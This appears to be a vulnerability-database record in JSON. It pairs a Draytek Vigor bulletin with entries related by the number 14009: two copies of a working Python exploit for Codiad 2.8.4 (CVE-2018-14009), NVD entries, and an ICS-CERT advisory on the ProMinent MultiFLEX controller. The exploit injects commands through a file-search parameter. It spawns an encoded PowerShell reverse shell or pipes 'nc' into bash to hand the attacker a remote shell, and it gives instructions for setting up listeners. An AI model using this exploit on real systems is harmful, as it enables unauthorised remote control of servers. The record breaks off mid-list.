ID SECURITYVULNS:VULN:14009
Type securityvulns
Reporter BUGTRAQ
Modified 2014-10-14T00:00:00
Description
Default account, unauthorized access, directory traversal.
{"id": "SECURITYVULNS:VULN:14009", "bulletinFamily": "software", "title": "Draytek Vigor ACS-SI multiple security vulnerabilities", "description": "Default account, unauthorized access, directory traversal.", "published": "2014-10-14T00:00:00", "modified": "2014-10-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14009", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31177", "https://vulners.com/securityvulns/securityvulns:doc:31175"], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:09:57", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2018-08-31T11:09:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-14009"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1498.NASL", "EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1496.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1483.NASL", "EULEROS_SA-2020-1489.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201489", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201446", "OPENVAS:1361412562311220201477", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201476", "OPENVAS:1361412562311220201430", "OPENVAS:1361412562311220201473"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31175", "SECURITYVULNS:DOC:31177"]}], "modified": "2018-08-31T11:09:57", "rev": 2}, "vulnersScore": 5.9}, "affectedSoftware": [{"name": "Vigor", "operator": "eq", "version": "2130"}, {"name": "VigorACS SI", "operator": "eq", "version": "1.3"}], "immutableFields": []}
{"packetstorm": [{"lastseen": "2021-03-24T14:45:00", "description": "", "published": "2021-03-24T00:00:00", "type": "packetstorm", "title": "Codiad 2.8.4 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14009"], "modified": "2021-03-24T00:00:00", "id": "PACKETSTORM:161944", "href": "https://packetstormsecurity.com/files/161944/Codiad-2.8.4-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) \n# Discovery by: WangYihang \n# Vendor Homepage: http://codiad.com/ \n# Software Links : https://github.com/Codiad/Codiad/releases \n# Tested Version: Version: 2.8.4 \n# CVE: CVE-2018-14009 \n \n \n#!/usr/bin/env python \n# encoding: utf-8 \nimport requests \nimport sys \nimport json \nimport base64 \nsession = requests.Session() \ndef login(domain, username, password): \nglobal session \nurl = domain + \"/components/user/controller.php?action=authenticate\" \ndata = { \n\"username\": username, \n\"password\": password, \n\"theme\": \"default\", \n\"language\": \"en\" \n} \nresponse = session.post(url, data=data, verify=False) \ncontent = response.text \nprint(\"[+] Login Content : %s\" % (content)) \nif 'status\":\"success\"' in content: \nreturn True \ndef get_write_able_path(domain): \nglobal session \nurl = domain + \"/components/project/controller.php?action=get_current\" \nresponse = session.get(url, verify=False) \ncontent = response.text \nprint(\"[+] Path Content : %s\" % (content)) \njson_obj = json.loads(content) \nif json_obj['status'] == \"success\": \nreturn json_obj['data']['path'] \nelse: \nreturn False \ndef base64_encode_2_bytes(host, port): \npayload = ''' \n$client = New-Object System.Net.Sockets.TCPClient(\"__HOST__\",__PORT__); \n$stream = $client.GetStream(); \n[byte[]]$bytes = 0..255|%{0}; \nwhile(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ \n$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); \n$sendback = (iex $data 2>&1 | Out-String ); \n$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \"; \n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); \n$stream.Write($sendbyte,0,$sendbyte.Length); \n$stream.Flush(); \n} \n$client.Close(); \n''' \nresult = \"\" \nfor i in payload.replace(\"__HOST__\", host).replace(\"__PORT__\", str(port)): \nresult += i + \"\\x00\" \nreturn base64.b64encode(result.encode()).decode().replace(\"\\n\", \"\") \ndef build_powershell_payload(host, port): \npreffix = \"powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc \" \nreturn preffix + base64_encode_2_bytes(host, port).replace(\"+\", \"%2b\") \ndef exploit(domain, username, password, host, port, path, platform): \nglobal session \nurl = domain + \\ \n\"components/filemanager/controller.php?type=1&action=search&path=%s\" % ( \npath) \nif platform.lower().startswith(\"win\"): \n# new version escapeshellarg \n# escapeshellarg on windows will quote the arg with \"\" \n# so we need to try twice \npayload = '||%s||' % (build_powershell_payload(host, port)) \npayload = \"search_string=Hacker&search_file_type=\" + payload \nheaders = { \n\"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"} \nresponse = session.post(url, data=payload, headers=headers, verify=False) \ncontent = response.text \nprint(content) \n# old version escapeshellarg \npayload = '%%22||%s||' % (build_powershell_payload(host, port)) \npayload = \"search_string=Hacker&search_file_type=\" + payload \nheaders = { \n\"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"} \nresponse = session.post(url, data=payload, headers=headers, verify=False) \ncontent = response.text \nprint(content) \nelse: \n# payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F''' + host + '''%2F''' + port + '''+0%3E%261'%0Agrep+%22SniperOJ''' \npayload = '\"%%0Anc %s %d|/bin/bash %%23' % (host, port) \npayload = \"search_string=Hacker&search_file_type=\" + payload \nheaders = { \n\"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"} \nresponse = session.post(url, data=payload, headers=headers, verify=False) \ncontent = response.text \nprint(content) \ndef promote_yes(hint): \nprint(hint) \nwhile True: \nans = input(\"[Y/n] \").lower() \nif ans == 'n': \nreturn False \nelif ans == 'y': \nreturn True \nelse: \nprint(\"Incorrect input\") \ndef main(): \nif len(sys.argv) != 7: \nprint(\"Usage : \") \nprint(\" python %s [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]\" % (sys.argv[0])) \nprint(\" python %s [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]\" % (sys.argv[0])) \nprint(\"Example : \") \nprint(\" python %s http://localhost/ admin admin 8.8.8.8 8888 linux\" % (sys.argv[0])) \nprint(\" python %s http://localhost:8080/ admin admin 8.8.8.8 8888 windows\" % (sys.argv[0])) \nprint(\"Author : \") \nprint(\" WangYihang <wangyihanger@gmail.com>\") \nexit(1) \ndomain = sys.argv[1] \nusername = sys.argv[2] \npassword = sys.argv[3] \nhost = sys.argv[4] \nport = int(sys.argv[5]) \nplatform = sys.argv[6] \nif platform.lower().startswith(\"win\"): \nprint(\"[+] Please execute the following command on your vps: \") \nprint(\"nc -lnvp %d\" % (port)) \nif not promote_yes(\"[+] Please confirm that you have done the two command above [y/n]\"): \nexit(1) \nelse: \nprint(\"[+] Please execute the following command on your vps: \") \nprint(\"echo 'bash -c \\\"bash -i >/dev/tcp/%s/%d 0>&1 2>&1\\\"' | nc -lnvp %d\" % (host, port + 1, port)) \nprint(\"nc -lnvp %d\" % (port + 1)) \nif not promote_yes(\"[+] Please confirm that you have done the two command above [y/n]\"): \nexit(1) \nprint(\"[+] Starting...\") \nif not login(domain, username, password): \nprint(\"[-] Login failed! Please check your username and password.\") \nexit(2) \nprint(\"[+] Login success!\") \nprint(\"[+] Getting writeable path...\") \npath = get_write_able_path(domain) \nif path == False: \nprint(\"[+] Get current path error!\") \nexit(3) \nprint(\"[+] Writeable Path : %s\" % (path)) \nprint(\"[+] Sending payload...\") \nexploit(domain, username, password, host, port, path, platform) \nprint(\"[+] Exploit finished!\") \nprint(\"[+] Enjoy your reverse shell!\") \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161944/codiad284-exec.txt"}], "exploitdb": [{"lastseen": "2021-03-23T18:42:21", "description": "", "published": "2021-03-23T00:00:00", "type": "exploitdb", "title": "Codiad 2.8.4 - Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14009"], "modified": "2021-03-23T00:00:00", "id": "EDB-ID:49705", "href": "https://www.exploit-db.com/exploits/49705", "sourceData": "# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated)\r\n# Discovery by: WangYihang\r\n# Vendor Homepage: http://codiad.com/\r\n# Software Links : https://github.com/Codiad/Codiad/releases\r\n# Tested Version: Version: 2.8.4\r\n# CVE: CVE-2018-14009\r\n\r\n#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\nimport requests\r\nimport sys\r\nimport json\r\n\r\nsession = requests.Session()\r\n\r\n\r\ndef login(domain, username, password):\r\n global session\r\n url = domain + \"/components/user/controller.php?action=authenticate\"\r\n data = {\r\n \"username\": username,\r\n \"password\": password,\r\n \"theme\": \"default\",\r\n \"language\": \"en\"\r\n }\r\n response = session.post(url, data=data, verify=False)\r\n content = response.content\r\n print \"[+] Login Content : %s\" % (content)\r\n if 'status\":\"success\"' in content:\r\n return True\r\n\r\n\r\ndef get_write_able_path(domain):\r\n global session\r\n url = domain + \"/components/project/controller.php?action=get_current\"\r\n response = session.get(url, verify=False)\r\n content = response.content\r\n print \"[+] Path Content : %s\" % (content)\r\n json_obj = json.loads(content)\r\n if json_obj['status'] == \"success\":\r\n return json_obj['data']['path']\r\n else:\r\n return False\r\n\r\n\r\ndef base64_encode_2_bytes(host, port):\r\n payload = '''\r\n $client = New-Object System.Net.Sockets.TCPClient(\"__HOST__\",__PORT__);\r\n $stream = $client.GetStream();\r\n [byte[]]$bytes = 0..255|%{0};\r\n while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){\r\n $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\r\n $sendback = (iex $data 2>&1 | Out-String );\r\n $sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";\r\n $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\r\n $stream.Write($sendbyte,0,$sendbyte.Length);\r\n $stream.Flush();\r\n }\r\n $client.Close();\r\n '''\r\n result = \"\"\r\n for i in payload.replace(\"__HOST__\", host).replace(\"__PORT__\", str(port)):\r\n result += i + \"\\x00\"\r\n return result.encode(\"base64\").replace(\"\\n\", \"\")\r\n\r\n\r\ndef build_powershell_payload(host, port):\r\n preffix = \"powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc \"\r\n return preffix + base64_encode_2_bytes(host, port).replace(\"+\", \"%2b\")\r\n\r\n\r\ndef exploit(domain, username, password, host, port, path, platform):\r\n global session\r\n url = domain + \\\r\n \"components/filemanager/controller.php?type=1&action=search&path=%s\" % (\r\n path)\r\n if platform.lower().startswith(\"win\"):\r\n # new version escapeshellarg\r\n # escapeshellarg on windows will quote the arg with \"\"\r\n # so we need to try twice\r\n payload = '||%s||' % (build_powershell_payload(host, port))\r\n payload = \"search_string=Hacker&search_file_type=\" + payload\r\n headers = {\r\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"}\r\n response = session.post(url, data=payload, headers=headers, verify=False)\r\n content = response.content\r\n print content\r\n\r\n # old version escapeshellarg\r\n payload = '%%22||%s||' % (build_powershell_payload(host, port))\r\n payload = \"search_string=Hacker&search_file_type=\" + payload\r\n headers = {\r\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"}\r\n response = session.post(url, data=payload, headers=headers, verify=False)\r\n content = response.content\r\n print content\r\n else:\r\n # payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F''' + host + '''%2F''' + port + '''+0%3E%261'%0Agrep+%22SniperOJ'''\r\n payload = '\"%%0Anc %s %d|/bin/bash %%23' % (host, port)\r\n payload = \"search_string=Hacker&search_file_type=\" + payload\r\n headers = {\r\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"}\r\n response = session.post(url, data=payload, headers=headers, verify=False)\r\n content = response.content\r\n print content\r\n\r\n\r\ndef promote_yes(hint):\r\n print hint\r\n while True:\r\n ans = raw_input(\"[Y/n] \").lower()\r\n if ans == 'n':\r\n return False\r\n elif ans == 'y':\r\n return True\r\n else:\r\n print \"Incorrect input\"\r\n\r\n\r\ndef main():\r\n if len(sys.argv) != 7:\r\n print \"Usage : \"\r\n print \" python %s [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]\" % (sys.argv[0])\r\n print \" python %s [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]\" % (sys.argv[0])\r\n print \"Example : \"\r\n print \" python %s http://localhost/ admin admin 8.8.8.8 8888 linux\" % (sys.argv[0])\r\n print \" python %s http://localhost:8080/ admin admin 8.8.8.8 8888 windows\" % (sys.argv[0])\r\n print \"Author : \"\r\n print \" WangYihang <wangyihanger@gmail.com>\"\r\n exit(1)\r\n domain = sys.argv[1]\r\n username = sys.argv[2]\r\n password = sys.argv[3]\r\n host = sys.argv[4]\r\n port = int(sys.argv[5])\r\n platform = sys.argv[6]\r\n if platform.lower().startswith(\"win\"):\r\n print \"[+] Please execute the following command on your vps: \"\r\n print \"nc -lnvp %d\" % (port)\r\n if not promote_yes(\"[+] Please confirm that you have done the two command above [y/n]\"):\r\n exit(1)\r\n else:\r\n print \"[+] Please execute the following command on your vps: \"\r\n print \"echo 'bash -c \\\"bash -i >/dev/tcp/%s/%d 0>&1 2>&1\\\"' | nc -lnvp %d\" % (host, port + 1, port)\r\n print \"nc -lnvp %d\" % (port + 1)\r\n if not promote_yes(\"[+] Please confirm that you have done the two command above [y/n]\"):\r\n exit(1)\r\n print \"[+] Starting...\"\r\n if not login(domain, username, password):\r\n print \"[-] Login failed! Please check your username and password.\"\r\n exit(2)\r\n print \"[+] Login success!\"\r\n print \"[+] Getting writeable path...\"\r\n path = get_write_able_path(domain)\r\n if path == False:\r\n print \"[+] Get current path error!\"\r\n exit(3)\r\n print \"[+] Writeable Path : %s\" % (path)\r\n print \"[+] Sending payload...\"\r\n exploit(domain, username, password, host, port, path, platform)\r\n print \"[+] Exploit finished!\"\r\n print \"[+] Enjoy your reverse shell!\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49705"}], "cve": [{"lastseen": "2021-02-02T07:12:51", "description": "Out of bound memory access while processing TZ command handler due to improper input validation on response length received from user in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8098, MDM9150, MDM9607, MDM9650, MSM8905, MSM8909, MSM8998, SDA660, SDA845, SDM630, SDM636, SDM660, SDM845, SDM850, SXR2130", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-16T11:15:00", "title": "CVE-2019-14009", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14009"], "modified": "2020-04-22T14:17:00", "cpe": ["cpe:/o:qualcomm:sda660_firmware:-", "cpe:/o:qualcomm:msm8998_firmware:-", "cpe:/o:qualcomm:apq8098_firmware:-", "cpe:/o:qualcomm:sda845_firmware:-", "cpe:/o:qualcomm:sdm636_firmware:-", "cpe:/o:qualcomm:msm8909_firmware:-", "cpe:/o:qualcomm:sdm845_firmware:-", "cpe:/o:qualcomm:apq8009_firmware:-", "cpe:/o:qualcomm:sxr2130_firmware:-", "cpe:/o:qualcomm:sdm660_firmware:-", "cpe:/o:qualcomm:msm8905_firmware:-", "cpe:/o:qualcomm:mdm9150_firmware:-", "cpe:/o:qualcomm:mdm9607_firmware:-", "cpe:/o:qualcomm:sdm850_firmware:-", "cpe:/o:qualcomm:sdm630_firmware:-", "cpe:/o:qualcomm:mdm9650_firmware:-"], "id": "CVE-2019-14009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14009", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:qualcomm:mdm9650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8009_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sda845_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm850_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sda660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm636_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8909_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8098_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8905_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm845_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9607_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sxr2130_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-01T14:12:23", "description": "Codiad through 2.8.4 allows Remote Code Execution, a different vulnerability than CVE-2017-11366 and CVE-2017-15689.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-12T16:29:00", "title": "CVE-2018-14009", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14009"], "modified": "2021-03-31T15:30:00", "cpe": ["cpe:/a:codiad:codiad:2.8.4"], "id": "CVE-2018-14009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14009", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:codiad:codiad:2.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:36", "description": "An Information Exposure issue was discovered in ProMinent MultiFLEX M10a Controller web interface. When an authenticated user uses the Change Password feature on the application, the current password for the user is specified in plaintext. This may allow an attacker who has been authenticated to gain access to the password.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-17T22:29:00", "title": "CVE-2017-14009", "type": "cve", "cwe": ["CWE-319"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14009"], "modified": "2019-10-09T23:23:00", "cpe": ["cpe:/o:prominent:multiflex_m10a_controller_firmware:*"], "id": "CVE-2017-14009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14009", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:prominent:multiflex_m10a_controller_firmware:*:*:*:*:*:*:*:*"]}], "ics": [{"lastseen": "2021-02-27T19:52:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-14005", "CVE-2017-14007", "CVE-2017-14009", "CVE-2017-14011", "CVE-2017-14013"], "description": "### **CVSS v3 8.8**\n\n**ATTENTION: **Remotely exploitable/low skill level to exploit.\n\n**Vendor:** ProMinent\n\n**Equipment:** MultiFLEX M10a Controller\n\n**Vulnerabilities:** Client-Side Enforcement of Server-Side Security, Insufficient Session Expiration, Cross-Site Request Forgery, Information Exposure, and Unverified Password Change\n\n## AFFECTED PRODUCTS\n\nThe following versions of MultiFLEX Controller, a water treatment controller, are affected:\n\n * All versions of MultiFLEX M10a Controller web interface.\n\n## IMPACT\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to bypass protection mechanisms, assume the identity of authenticated users, and change the device configuration.\n\n## MITIGATION\n\nProMinent has not provided mitigations for these vulnerabilities.\n\nNCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## VULNERABILITY OVERVIEW\n\n## [CLIENT-SIDE ENFORCEMENT OF SERVER-SIDE SECURITY CWE-602](<https://cwe.mitre.org/data/definitions/602.html>)\n\nThe log out function in the application removes the user\u2019s session only on the client side. This may allow an attacker to bypass protection mechanisms, gain privileges, or assume the identity of an authenticated user.\n\n[CVE-2017-14013](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14013>) has been assigned to this vulnerability. A CVSS v3 base score of 5.6 has been assigned; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n## [INSUFFICIENT SESSION EXPIRATION CWE-613](<https://cwe.mitre.org/data/definitions/613.html>)\n\nThe user\u2019s session is available for an extended period beyond the last activity, allowing an attacker to reuse an old session for authorization.\n\n[CVE-2017-14007](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14007>) has been assigned to this vulnerability. A CVSS v3 base score of 5.6 has been assigned; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n## [CROSS-SITE REQUEST FORGERY (CSRF) CWE-352](<https://cwe.mitre.org/data/definitions/352.html>)\n\nThe application does not sufficiently verify requests, making it susceptible to cross-site request forgery. This may allow an attacker to execute unauthorized code, resulting in changes to the configuration of the device.\n\n[CVE-2017-14011](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14011>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n## [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nWhen an authenticated user uses the \u201cChange Password\u201d feature on the application, the current password for the user is specified in plaintext. This may allow an attacker who has been authenticated to gain access to the password.\n\n[CVE-2017-14009](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14009>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N>)).\n\n## [UNVERIFIED PASSWORD CHANGE CWE-620](<https://cwe.mitre.org/data/definitions/620.html>)\n\nWhen setting a new password for a user, the application does not require the user to know the original password. An attacker who is authenticated could change a user\u2019s password, enabling future access and possible configuration changes.\n\n[CVE-2017-14005](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14005>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n## RESEARCHER\n\nMaxim Rupp disclosed this vulnerability to ICS-CERT.\n\n## BACKGROUND\n\n**Critical Infrastructure Sector:** Water and Wastewater Systems\n\n**Countries/Areas Deployed:** Worldwide\n\n**Company Headquarters Location:** Ontario, California\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-17-285-01>); we'd welcome your feedback.\n", "modified": "2017-10-12T00:00:00", "published": "2017-10-12T00:00:00", "id": "ICSA-17-285-01", "href": "https://www.us-cert.gov/ics/advisories/ICSA-17-285-01", "type": "ics", "title": "ProMinent MultiFLEX M10a Controller", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", 